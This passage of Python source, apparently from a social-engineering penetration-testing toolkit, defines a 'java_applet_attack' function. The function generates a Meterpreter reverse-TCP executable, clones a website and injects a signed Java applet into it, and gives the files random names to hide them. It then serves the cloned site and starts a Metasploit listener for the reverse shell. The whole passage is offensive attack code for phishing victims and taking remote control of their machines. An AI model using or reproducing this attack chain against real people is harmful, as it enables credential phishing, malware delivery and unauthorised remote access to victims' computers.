(website, port, directory)
| 655 | # and additional capabilities. |
| 656 | # |
| 657 | def java_applet_attack(website, port, directory): |
| 658 | # create the payload |
| 659 | meterpreter_reverse_tcp_exe(port) |
| 660 | # clone the website and inject java applet |
| 661 | site_cloner(website, directory, "java") |
| 662 | |
| 663 | # this part is needed to rename the msf.exe file to a randomly generated |
| 664 | # one |
| 665 | filename = check_options("MSF.EXE=") |
| 666 | if check_options != 0: |
| 667 | |
| 668 | # move the file to the specified directory and filename |
| 669 | subprocess.Popen("cp %s/msf.exe %s/%s" % (userconfigpath, directory, filename), |
| 670 | stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() |
| 671 | |
| 672 | applet_name = check_options("APPLET_NAME=") |
| 673 | if applet_name == "": |
| 674 | applet_name = generate_random_string(6, 15) + ".jar" |
| 675 | |
| 676 | # lastly we need to copy over the signed applet |
| 677 | subprocess.Popen( |
| 678 | "cp %s/Signed_Update.jar %s/%s" % (userconfigpath, directory, applet_name), |
| 679 | stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() |
| 680 | |
| 681 | # start the web server by running it in the background |
| 682 | start_web_server(directory) |
| 683 | |
| 684 | # run multi handler for metasploit |
| 685 | print_info("Starting the multi/handler through Metasploit...") |
| 686 | metasploit_listener_start("windows/meterpreter/reverse_tcp", port) |
| 687 | |
| 688 | # |
| 689 | # this will create a raw PDE file for you to use in your teensy device |
nothing calls this directly
no test coverage detected